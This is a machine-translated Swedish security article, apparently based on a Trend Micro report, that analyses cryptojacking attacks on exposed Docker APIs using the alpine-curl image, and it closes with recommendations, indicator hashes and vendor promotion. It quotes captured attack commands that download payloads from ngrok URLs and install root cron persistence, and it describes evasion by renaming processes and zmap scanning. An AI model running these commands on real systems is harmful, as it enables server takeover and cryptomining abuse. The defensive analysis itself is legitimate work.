Hur det icke-proprietära Docker API och offentliga bilder från communityn används för att distribuera gruvarbetare för kryptovaluta

Vi analyserade data som samlats in med hjälp av honeypot-behållare, som vi skapade för att spåra hot. Och vi upptäckte betydande aktivitet från oönskade eller obehöriga kryptovalutagruvarbetare utplacerade som oseriösa behållare med hjälp av en community-publicerad bild på Docker Hub. Bilden används som en del av en tjänst som levererar skadliga gruvarbetare i kryptovaluta.

Dessutom installeras program för att arbeta med nätverk för att penetrera öppna närliggande containrar och applikationer.

Vi lämnar våra honeypots som de är, det vill säga med standardinställningar, utan några säkerhetsåtgärder eller efterföljande installation av ytterligare programvara. Observera att Docker har rekommendationer för initial installation för att undvika fel och enkla sårbarheter. Men honungskrukorna som används är behållare, designade för att upptäcka attacker riktade mot containeriseringsplattformen, inte applikationerna inuti behållarna.

Den upptäckta skadliga aktiviteten är också anmärkningsvärd eftersom den inte kräver sårbarheter och är också oberoende av Docker-versionen. Att hitta en felaktigt konfigurerad och därför öppen containerbild är allt som angripare behöver för att infektera många öppna servrar.

Den ostängda Docker API låter användaren utföra ett brett utbud av lag, inklusive att få en lista över körande behållare, hämta loggar från en specifik behållare, starta, stoppa (inklusive tvingad) och till och med skapa en ny behållare från en specifik bild med specificerade inställningar.

Till vänster är leveransmetoden för skadlig programvara. Till höger finns angriparens miljö, som möjliggör fjärrrullning av bilder.

Fördelning per land av 3762 öppna Docker API:er. Baserat på Shodan-sökning daterad 12.02.2019-XNUMX-XNUMX

Alternativ för attackkedja och nyttolast

Skadlig aktivitet upptäcktes inte bara med hjälp av honungskrukor. Data från Shodan visar att antalet exponerade Docker-API:er (se andra grafen) har ökat sedan vi undersökte en felkonfigurerad behållare som användes som en brygga för att distribuera Monero-programvara för brytning av kryptovaluta. I oktober förra året (2018, aktuella uppgifter du kan se ut så här cirka. översättare) fanns det bara 856 öppna API:er.

En granskning av honeypot-loggarna visade att användningen av containerbilder också var förknippad med användningen av ngrok, ett verktyg för att upprätta säkra anslutningar eller vidarebefordra trafik från allmänt tillgängliga punkter till specificerade adresser eller resurser (till exempel localhost). Detta tillåter angripare att dynamiskt skapa webbadresser när de levererar nyttolast till en öppen server. Nedan är kodexempel från loggarna som visar missbruk av ngrok-tjänsten:

Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,

Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Som du kan se laddas de uppladdade filerna ner från webbadresser som ständigt ändras. Dessa webbadresser har ett kort utgångsdatum, så nyttolaster kan inte laddas ner efter utgångsdatumet.

Det finns två alternativ för nyttolast. Det första är en kompilerad miner i ELF-format för Linux (identifierad som Coinminer.SH.MALXMR.ATNO), som ansluter till miningpoolen. Det andra är ett skript (TrojanSpy.SH.ZNETMAP.A), utformat för att hämta vissa nätverksverktyg som används för att skanna nätverksområden och sedan söka efter nya mål.

Dropper-skriptet ställer in två variabler, som sedan används för att distribuera kryptovalutaminer. HOST-variabeln innehåller URL:en där de skadliga filerna finns, och RIP-variabeln är filnamnet (i själva verket hashen) för gruvarbetaren som ska distribueras. Variabeln HOST ändras varje gång hashvariabeln ändras. Skriptet försöker också kontrollera att inga andra gruvarbetare för kryptovaluta körs på den attackerade servern.

Exempel på HOST- och RIP-variabler, samt ett kodavsnitt som används för att kontrollera att inga andra gruvarbetare körs

Innan minern startas byter den namn till nginx. Andra versioner av detta skript byter namn på minern till andra legitima tjänster som kan finnas i miljön. LinuxDetta räcker vanligtvis för att kringgå kontroller i listan över körande processer.

Sökskriptet har också funktioner. Det fungerar med samma URL-tjänst för att distribuera nödvändiga verktyg. Bland dem är zmap binär, som används för att skanna nätverk och få en lista över öppna portar. Skriptet laddar också en annan binär som används för att interagera med de hittade tjänsterna och ta emot banners från dem för att fastställa ytterligare information om den hittade tjänsten (till exempel dess version).

Skriptet bestämmer också vissa nätverksintervall som ska skannas, men detta beror på versionen av skriptet. Den ställer också in målportarna från tjänsterna – i det här fallet Docker – innan skanningen körs.

När potentiella mål hittas tas banners automatiskt bort från dem. Skriptet filtrerar också mål baserat på de tjänster, applikationer, komponenter eller plattformar det är intresserad av: Redis, Jenkins, Drupal, MODX, Kubernetes mästare, Docker 1.16-klient och Apache CouchDB. Om den skannade servern matchar någon av dem sparas den i en textfil, som angripare senare kan använda för efterföljande analys och hackning. Dessa textfiler laddas upp till angriparnas servrar via dynamiska länkar. Det vill säga att en separat URL används för varje fil, vilket gör att efterföljande åtkomst är svår.

Attackvektorn är en Docker-bild, vilket kan ses i de följande två kodbitarna.

Längst upp är att byta namn till en legitim tjänst, och längst ner är hur zmap används för att skanna nätverk

Överst finns fördefinierade nätverksintervall, längst ner finns specifika portar för att söka efter tjänster, inklusive Docker

Skärmdumpen visar att alpin-curl-bilden har laddats ner mer än 10 miljoner gånger

Baserat på Alpine Linux och curl, ett resurseffektivt CLI-verktyg för att överföra filer över olika protokoll, kan kompileras Docker-bild. Som du kan se i föregående bild har den här bilden redan laddats ner mer än 10 miljoner gånger. Ett stort antal nedladdningar kan innebära att du använder den här bilden som en ingångspunkt; den här bilden uppdaterades för mer än sex månader sedan; användare laddade inte ner andra bilder från det här arkivet så ofta. I Docker ingångspunkt - en uppsättning instruktioner som används för att konfigurera en container för att köra den. Om ingångspunktsinställningarna är felaktiga (till exempel om behållaren lämnas öppen från Internet) kan bilden användas som en attackvektor. Angripare kan använda den för att leverera en nyttolast om de hittar en felkonfigurerad eller öppen container som inte stöds.

Det är viktigt att notera att denna bild (alpin-curl) i sig inte är skadlig, men som du kan se ovan kan den användas för att utföra skadliga funktioner. Liknande Docker-bilder kan också användas för att utföra skadliga aktiviteter. Vi kontaktade Docker och arbetade med dem i denna fråga.

Rekommendationer

Felaktig inställning förblir konstant problem för många företag, särskilt de som implementerar DevOps, fokuserat på snabb utveckling och leverans. Allt förvärras av behovet av att följa revisions- och övervakningsreglerna, behovet av att övervaka datakonfidentialitet, såväl som den enorma skadan från deras bristande efterlevnad. Att införliva säkerhetsautomation i utvecklingens livscykel hjälper dig inte bara att hitta säkerhetshål som annars skulle kunna förbli oupptäckta, utan det hjälper dig också att minska onödig arbetsbelastning, som att köra ytterligare programvarubyggen för varje upptäckt sårbarhet eller felkonfiguration efter att en applikation har distribuerats.

Incidenten som diskuteras i den här artikeln belyser behovet av att ta hänsyn till säkerheten från början, inklusive följande rekommendationer:

• För systemadministratörer och utvecklare: Kontrollera alltid dina API-inställningar för att se till att allt är konfigurerat för att endast acceptera förfrågningar från en specifik server eller internt nätverk.
• Följ principen om minsta rättigheter: se till att behållarbilder är signerade och verifierade, begränsa åtkomst till kritiska komponenter (container launch service) och lägg till kryptering till nätverksanslutningar.
• Följ rekommendationer och möjliggöra säkerhetsmekanismer, t.ex. från Docker och inbyggd säkerhetsfunktioner.
• Använd automatisk genomsökning av körtider och bilder för att få ytterligare information om processerna som körs i behållaren (till exempel för att upptäcka spoofing eller söka efter sårbarheter). Programkontroll och integritetsövervakning hjälper till att spåra onormala ändringar av servrar, filer och systemområden.

Trendmicro hjälper DevOps-team att bygga säkert, rulla ut snabbt och lansera var som helst. Trend Micro Hybrid molnsäkerhet Ger kraftfull, strömlinjeformad och automatiserad säkerhet över en organisations DevOps-pipeline och tillhandahåller flera hotförsvar XGen för att skydda fysiska, virtuella och molnbelastningar vid körning. Det lägger också till containersäkerhet med Djup säkerhet и Deep Security Smart Check, som skannar Docker-containerbilder efter skadlig programvara och sårbarheter när som helst i utvecklingspipelinen för att förhindra hot innan de distribueras.

Tecken på kompromiss

Relaterade hash:

• 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
• f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

På Docker videokurs Övande högtalare visar vilka inställningar som måste göras först för att minimera sannolikheten eller helt undvika att den situation som beskrivs ovan uppstår. Och den 19-21 augusti på en onlineintensiv DevOps-verktyg och fusk Du kan diskutera dessa och liknande säkerhetsproblem med kollegor och praktiserande lärare vid ett rundabordsbord, där alla kan tala ut och lyssna på erfarna kollegors smärtor och framgångar.

Källa: will.com